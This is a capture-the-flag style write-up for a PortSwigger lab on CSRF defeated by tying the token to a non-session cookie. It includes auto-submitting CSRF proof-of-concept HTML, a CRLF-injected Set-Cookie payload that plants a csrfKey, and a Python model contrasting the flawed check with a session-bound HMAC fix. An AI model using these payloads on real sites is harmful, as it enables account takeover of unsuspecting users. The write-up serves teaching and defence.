CSRF where token is tied to non-session cookie
Objective
This lab’s email change functionality is vulnerable to CSRF. It uses tokens to try to prevent CSRF attacks, but they aren’t fully integrated into the site’s session handling system.
To solve the lab, use your exploit server to host an HTML page that uses a CSRF attack to change the viewer’s email address.
You have two accounts on the application that you can use to help design your attack. The credentials are as follows:
wiener:peter
carlos:montoya
Solution
After logging in, the Update email function is vulnerable to CSRF just like in the other labs we saw,
but here there are additional measures that have to be bypassed.
If we update the email, this is how the request and response look:
Now, let's generate a simple CSRF PoC and test it in the current user session, which is wiener.
It works and updates the email to the value I provided:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="https://0ae400b403c3a094802ae41800ad0033.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="2@2.com" />
<input type="hidden" name="csrf" value="f3QjcLNuEvtdJ2kz3MPz0wYHq83LZKli" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
For wiener it works, but when I logged in as carlos
and tested the PoC, it didn't work because of an Invalid CSRF token error.
Let's fine-tune the CSRF PoC. The first step is to copy the CSRF token from the page source right after logging in as carlos,
and then copy the csrfKey
by intercepting the update-email request and taking it from the Cookie header.
The fine-tuned CSRF PoC looks as follows:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="https://0ae400b403c3a094802ae41800ad0033.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="attacker233333@2.com" />
<input type="hidden" name="csrf" value="HVXSXAHpIyEbsNBBLt9LO2rxlKWTGzub" />
<input type="submit" value="Submit request" />
</form>
<img src="https://0ae400b403c3a094802ae41800ad0033.web-security-academy.net/?search=nithisshtest%0d%0aSet-Cookie:%20csrfKey=KosN7sSRNilWGKqc6ihUuKUhprqtGQyn%3b%20SameSite=None" onerror="document.forms[0].submit();"/>
</body>
</html>
Let's walk through how it works. The home page has a search function that is vulnerable to a CRLF injection, through which we can inject the csrfKey cookie
that we copied, while the csrf field in the form carries the CSRF token copied from the POST
body of the carlos
user when updating the email. If all goes well, paste the CSRF PoC into the exploit server and click Store -> Deliver exploit to victim,
and that solves the lab.
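To show why the lab's token check fails and what the fix looks like, here is an added Python model (my own code, not the lab's or PortSwigger's): the vulnerable check ties the token only to the csrfKey cookie, so a planted csrfKey plus its matching token passes in any session, while the hardened check derives the token from the session cookie with an HMAC. The in-memory token store, the cookie name "session" and the session ids are assumptions.

```python
import hashlib
import hmac
import secrets

# Server-side secret for the hardened scheme (constructed for this example).
SERVER_SECRET = secrets.token_bytes(32)


def issue_cookie_bound_pair(token_store):
    """Model of the lab: server hands out a csrfKey cookie and a csrf token that
    match each other, but neither is tied to the session cookie (assumed model)."""
    csrf_key = secrets.token_urlsafe(24)
    csrf_token = secrets.token_urlsafe(24)
    token_store[csrf_key] = csrf_token
    return csrf_key, csrf_token


def validate_cookie_bound(cookies, form_csrf, token_store):
    """Vulnerable check: only asks whether the csrf field matches the csrfKey
    cookie. Whoever can plant a csrfKey cookie (the CRLF-injected Set-Cookie
    above) can also supply the token that goes with it."""
    expected = token_store.get(cookies.get("csrfKey", ""))
    return expected is not None and hmac.compare_digest(expected, form_csrf)


def issue_session_bound_token(session_id):
    """Hardened: derive the token from the session cookie with a keyed MAC, so a
    token minted for one session is useless in another."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def validate_session_bound(cookies, form_csrf):
    session_id = cookies.get("session")
    if not session_id:
        return False
    return hmac.compare_digest(issue_session_bound_token(session_id), form_csrf)


def replay_scenario():
    """Attacker mints a pair in their own session and plants that csrfKey cookie
    in the victim's browser. Returns (vulnerable_accepts, hardened_accepts)."""
    token_store = {}
    attacker_key, attacker_token = issue_cookie_bound_pair(token_store)
    issue_cookie_bound_pair(token_store)  # victim's own, unrelated pair

    # Victim's cookie jar after the injected Set-Cookie: csrfKey=<attacker's key>
    victim_cookies = {"session": "victim-session-id", "csrfKey": attacker_key}

    vulnerable_accepts = validate_cookie_bound(victim_cookies, attacker_token, token_store)
    # Under the hardened scheme the attacker can only mint a token for their own session.
    hardened_accepts = validate_session_bound(victim_cookies, issue_session_bound_token("attacker-session-id"))
    return vulnerable_accepts, hardened_accepts
```

Calling replay_scenario() returns (True, False): the cookie-bound check accepts the planted pair, the session-bound check rejects it.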